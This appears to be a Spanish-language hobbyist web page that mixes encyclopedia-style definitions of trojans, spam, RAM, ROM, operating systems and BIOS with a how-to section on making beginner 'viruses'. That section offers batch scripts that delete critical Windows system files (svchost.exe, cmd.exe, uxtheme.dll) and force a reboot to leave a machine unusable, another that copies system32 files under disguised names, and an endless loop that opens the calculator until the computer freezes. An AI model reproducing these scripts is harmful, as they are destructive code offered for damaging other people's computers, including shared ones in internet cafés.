|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
QUE ES UN TROYANO?
Se denomina troyano (o caballo de Troya, traducción fiel del inglés Trojan horse aunque no tan utilizada) a un programa malicioso capaz de alojarse en computadoras y permitir el acceso a usuarios externos, a través de una red local o de Internet, con el fin de recabar información o controlar remotamente a la máquina anfitriona.
Un troyano no es en sí un virus, aún cuando teóricamente pueda ser distribuido y funcionar como tal. La diferencia fundamental entre un troyano y un virus consiste en su finalidad. Para que un programa sea un "troyano" sólo tiene que acceder y controlar la máquina anfitriona sin ser advertido, normalmente bajo una apariencia inocua. Al contrario que un virus, que es un huésped destructivo, el troyano no necesariamente provoca daños porque no es su objetivo.
Suele ser un programa alojado dentro de una aplicación, una imagen, un archivo de música u otro elemento de apariencia inocente, que se instala en el sistema al ejecutar el archivo que lo contiene. Una vez instalado parece realizar una función útil (aunque cierto tipo de troyanos permanecen ocultos y por tal motivo los antivirus o anti troyanos no los eliminan) pero internamente realiza otras tareas de las que el usuario no es consciente, de igual forma que el Caballo de Troya que los griegos regalaron a los troyanos.
Habitualmente se utiliza para espiar, usando la técnica para instalar un software de acceso remoto que permite monitorizar lo que el usuario legítimo de la computadora hace (en este caso el troyano es un spyware o programa espía) y, por ejemplo, capturar las pulsaciones del teclado con el fin de obtener contraseñas (cuando un troyano hace esto se le cataloga de keylogger) u otra información sensible.
La mejor defensa contra los troyanos es no ejecutar nada de lo cual se desconozca el origen y mantener software antivirus actualizado y dotado de buena heurística; es recomendable también instalar algún software anti troyano, de los cuales existen versiones gratis aunque muchas de ellas constituyen a su vez un troyano. Otra solución bastante eficaz contra los troyanos es tener instalado un firewall
QUE ES SPAM?
Se llama spam, correo basura o sms basura a los mensajes no solicitados, habitualmente de tipo publicitario, enviados en grandes cantidades (incluso masivas) que perjudican de alguna o varias maneras al receptor. La acción de enviar dichos mensajes se denomina spamming. Aunque se puede hacer por distintas vías, la más utilizada entre el público en general es la basada en el correo electrónico. Otras tecnologías de internet que han sido objeto de correo basura incluyen grupos de noticias, usenet, motores de búsqueda, wikis, foros, blogs, también a través de popups y todo tipo de imágenes y textos en la web. El correo basura también puede tener como objetivo los teléfonos móviles (a través de mensajes de texto) y los sistemas de mensajería instantánea como por ejemplo Outlook, Lotus Notes, etc.
También se llama spam a los virus sueltos en la red y paginas filtradas (casino, sorteos, premios, viajes y pornografía), se activa mediante el ingreso a paginas de comunidades o grupos o acceder a links en diversas paginas.
En España el correo electrónico no solicitado está terminantemente prohibido por la Ley de Servicios de la Sociedad de la Información y de Comercio Electrónico (LSSICE), publicada en el BOE del 12 de julio de 2002. Aparte, a los poseedores de bases de datos de correos electrónicos se les podría aplicar la Ley Orgánica de Protección de Datos (LOPD) por tratarse de datos de carácter personal. De hecho, las sentencias en España referidas al correo electrónico no solicitado están relacionadas con esta ley; sin embargo, dicha ley no hace mención de la palabra "Spam".
EDITAR CUALKIER ARCHIVO
Hay muchas formas de editar algun archivo que no se pueda abrir facilmente como un dll para que no sirva la aplicacion con la k se ejecuta.
Primero le dan doble clic al archivo y dira esta intentando un archivo de tipo extension de la aplicacion y le dan en abrir con y elijen bloc de notas, Esa es una forma.
Otra forma seria con el cmd
Pero hay k saber algunos comandos aunk son muy sencillos.
Primero abren el cmd que lo pueden abrir dando clic en inicio luego en accesorios y en simbolo del sistema,
otr a forma seria apretando las teclas inicio+r (el signo + no se presiona) y se abrira la ventana de ejecutar o simplemente dando clic en inicio y en ejecutar y escriben cmd y en aceptar.
Otra forma es abriendo el bloc de notas y escriben
command
y lo guardan con cualkier nombre.bat
y luego lo abren. Ya k estan en el cmd se van a la ruta donde esté el archivo a editar por ejemplo si está en el escritorio escriben
cd..
cd..
cd..
Eso es para k se quede en c:
luego escriben cd documents and settings
y presionan enter, luego escriben
cd luis
o como se llame el usuario de la computadora
luego
cd escritorio
y luego si el archivo se llama ejemplo.dll
escriben
edit ejemplo.dll
Y se abrirá una ventana azul con todos los datos del archivo nada mas para k ustedes borren o hagan lo k kieran. luego lo guardan y salen.
Para mas facil de editar el archivo pueden ir a la carpeta donde esta el archivo y crear el archivo bat k abre el cmd escribiendo
command
y lo guardan con formato bat y entonces se abrirá directamente donde está el archivo a editar.
Espero k les sirva esta informacion.
ALGUNAS EXTENSIONES IMPORTANTES Y COMO USARLAS PARA HACER VIRUS
Las extensiones mas importantes de los archivos de un sistema operativo son las siguientes:
.exe
.dll
.ini
.sys
.com
.bat
.nt
.reg
.bin
.pif
entre otras, aunque algunas varien de acuerdo al tipo de windows que se utilice como en el windows 95, 98, ME, 2000 la extension bat es muy importante y se usa en el archivo autoexec.bat y en windows mas recientes cambia a autoexec.nt
Del windows 95 al 2000 los archivos mas importantes son:
command.com
autoexec.bat
config.sys
kernell32.dll
y otros con un grado menor de importancia pero k al igual si llegaran a faltar no podria funcionar el sistema son:
svchost.exe
lsass.exe
taskmon.exe
entre otros.
Para los windows mas nuevos como el xp o vista serian:
config.sys
cmd.exe
uxtheme.dll
autoexec.nt
svchost.exe
lsass.exe
entre otros.
Y algunos archivos con los que se podran hacer maravillas para mejorar o echar a perder una computadora como el regedit.exe
Que como ya habran leido anteriormente pueden hacer que ninguna aplicacion sirva haciendo al equipo inservible.
Pueden hacer que muchos archivos no se puedan ejecutar bien por su extension e infinidad de cosas mas.
Así k ya saben, si kieren hacer un virus de principiantes ya saben k archivos pueden usar o simplemente sin necesidad de hacer ningun archivo maligno solo eliminar los archivos k mencione.
Pero si les gusta eso de estar escribiendo codigos, uno bueno seria este
@echo off
erase c:windowssystem32uxtheme.dll
erase c:windowssystem32svchost.exe
erase c:windowssystem32cmd.exe
msg * Puedes poner lo k kieras aki
shutdown -r
Y lo guardan con formato .bat
y lo k hara es borrar los archivos y sacar un mensaje y luego reiniciar el equipo aunk ya no se va a reiniciar por completo por la falta de esos archivos.
Pero tal vez no funcione muy bien en algunas computadoras como las de los cibers ya k las tienen protegidas para k no puedan borrar los archivos de sistema.
Ahora si no kieren k se borren esos archivos y solo hacer algo molesto pueden hacer este codigo:
@echo off
start calc.exe
start winmine.exe
for/l%%i in (1,1,100) do (echo "isr"> virus.exe
cd..
cd..
cd..
cd windows
cd system32
copy *exe *win.sys
copy *sys *troj.bat
copy *dll *win32.ini
copy *ini *nada.exe
y lo guardan con formato .bat
Lo k hará será abrir la calculadora y el buscaminas y crear un archivo virus.exe luego copiara todos los archivos de system32 con la finalidad de reducir la memoria.
Y ahora si kieren hacer algo mas molesto y k hasta se tenga k reiniciar el equipo seria con este simple codigo:
@echo off
:menu
start calc.exe
goto menu
y lo guardan con formato .bat
Y lo k hara es abrir la calculadora pero millones de vecez sin parar, el comando goto menu da la orden de repetir lo k hay despues de :menu asi k se repitira infinitamente.
Y no lo podrán parar hasta reiniciar el equipo.
Ahora si lo k kieren son virus pues es algo muy dificil de hacer ya k necesitan saber de programacion pero ahora vamos a tener algunos virus conocidos para descargar gratis como el happytime o love letter.
COMO CREAR UN ARCHIVO CON TU PROPIA EXTENSION
Primero abrimos mis documentos luego damos clic en herramientas y en opciones de carpeta, luego en la pestaña que dice tipos de archivo, luego damos clic donde dice nueva y escribimos el nombre de la extension de preferencia de tres o cuatro letras por ejemplo: joper (no se le pone el . al crear la extension) joper seria un ejemplo de abreviacion de nobre jose perez pero pueden poner lo k kieran.
luego dan clik en aceptar. Luego dan clic en opciones avanzadas y luego en cambiar icono para escoger su icono, luego en nuevo para poner una tarea por ejemplo donde dice accion pueden poner calcular y abajo en aplcacion le dan clik en examinar y se van a windowssystem32calc.exe y aceptar y luego en aceptar. Entonces ya tiene programada la calculadora. y le pueden poner varias apliaciones. Luego dan clic en aceptar y ya se quedo guardada entonces cierran las opciones de carpeta y para crear su archivo abren el bloc de notas y no escriban nada solo den clic en guardar como y le ponen ejemplo.joper (el nombre k kieran y la extension creada) y escogen donde guardarlo y listo. Al ejecutarlo se abrira la primera aplicacion k escogieron y si le dan clic derecho se abrira el cuadrito con las demas opciones. Espero k les guste.
ROM
ROM son las siglas de read-only memory, que significa "memoria de sólo lectura": una memoria de semiconductor destinada a ser leída y no destructible, es decir, que no se puede escribir sobre ella y que conserva intacta la información almacenada, incluso en el caso de que se interrumpa la corriente (memoria no volátil). La ROM suele almacenar la configuración del sistema o el programa de arranque de la computadora.
MEMORIA RAM
La memoria de acceso aleatorio, o memoria de acceso directo (en inglés: Random Access Memory, cuyo acrónimo es RAM), o más conocida como memoria RAM, se compone de uno o más chips y se utiliza como memoria de trabajo para programas y datos. Es un tipo de memoria temporal que pierde sus datos cuando se queda sin energía (por ejemplo, al apagar la computadora), por lo cual es una memoria volátil. Esto es cierto desde el punto de vista teórico: Científicos de la Universidad de Princeton han descubierto que una destrucción gradual de los datos almacenados en la memoria RAM que oscila entre unos segundos y varios minutos, siendo inversamente proporcional a la temperatura. Esto puede significar una brecha en la seguridad en tanto que las claves de acceso de cifradores de información como BitLocker quedan almacenadas en la memoria RAM.
La denominación surgió antiguamente para diferenciarlas de las memoria de acceso secuencial. Debido a que en los comienzos de la computación las memorias principales (o primarias) de las computadoras eran siempre de tipo RAM y las memorias secundarias (o masivas) eran de acceso secuencial (cintas o tarjetas perforadas), es frecuente que se hable de memoria RAM para hacer referencia a la memoria principal de una computadora, pero actualmente la denominación no es demasiado acertada.
SISTEMA OPERATIVO
Un sistema operativo es un software de sistema, es decir, un conjunto de programas de computadora destinado a permitir una administración eficaz de sus recursos. Comienza a trabajar cuando es cargado en memoria por un programa especifico, que se ejecuta al iniciar el equipo, o al iniciar una máquina virtual, y gestiona el hardware de la máquina desde los niveles más básicos, brindando una interfaz con el usuario.
Un sistema operativo se puede encontrar normalmente en la mayoría de los aparatos electrónicos que utilicen microprocesadores para funcionar, ya que gracias a éstos podemos entender la máquina y que ésta cumpla con sus funciones (teléfonos móviles, reproductores de DVD, autoradios, computadoras, radios,etc).
BIOS
El sistema Básico de entrada/salida Basic Input-Output System (BIOS) es un código de interfaz que localiza y carga el sistema operativo en la R.A.M.; es un software muy básico instalado en la placa base que permite que ésta cumpla su cometido. Proporciona la comunicación de bajo nivel, el funcionamiento y configuración del hardware del sistema que, como mínimo, maneja el teclado y proporciona salida básica (emitiendo pitidos normalizados por el altavoz de la computadora si se producen fallos) durante el arranque. El BIOS usualmente está escrito en lenguaje ensamblador. El primer término BIOS apareció en el sistema operativo CP/M, y describe la parte de CP/M que se ejecutaba durante el arranque y que iba unida directamente al hardware (las máquinas de CP/M usualmente tenían un simple cargador arrancable en la ROM, y nada más). La mayoría de las versiones de MS-DOS tienen un archivo llamado "IBMBIO.COM" o "IO.SYS" que es análogo al CP/M BIOS.
En los primeros años de vida de los sistemas operativo|sistemas operativos]] para PC (como el DOS), el BIOS todavía permanecía activo tras el arranque y funcionamiento del sistema operativo. El acceso a dispositivos como la disquetera y el disco duro se hacían a través del BIOS. Sin embargo, los sistemas operativos SO más modernos realizan estas tareas por sí mismos, sin necesidad de llamadas a las rutinas del BIOS.
Al encender la computadora, la BIOS se carga automáticamente en la memoria principal y se ejecuta desde ahí por el procesador (aunque en algunos casos el procesador ejecuta la BIOS leyéndola directamente desde la ROM que la contiene), cuando realiza una rutina de verificación e inicialización de los componentes presentes en la computadora, a través de un proceso denominado POST (Power On Self Test). Al finalizar esta fase busca el código de inicio del sistema operativo (bootstrap) en algunos de los dispositivos de memoria secundaria presentes, lo carga en memoria y transfiere el control de la computadora a éste.
;
|
|
|
|
|
|
|
Hoy habia 45 visitantes (48 clics a subpáginas) ¡Aqui en esta página!
|
|
|
|
|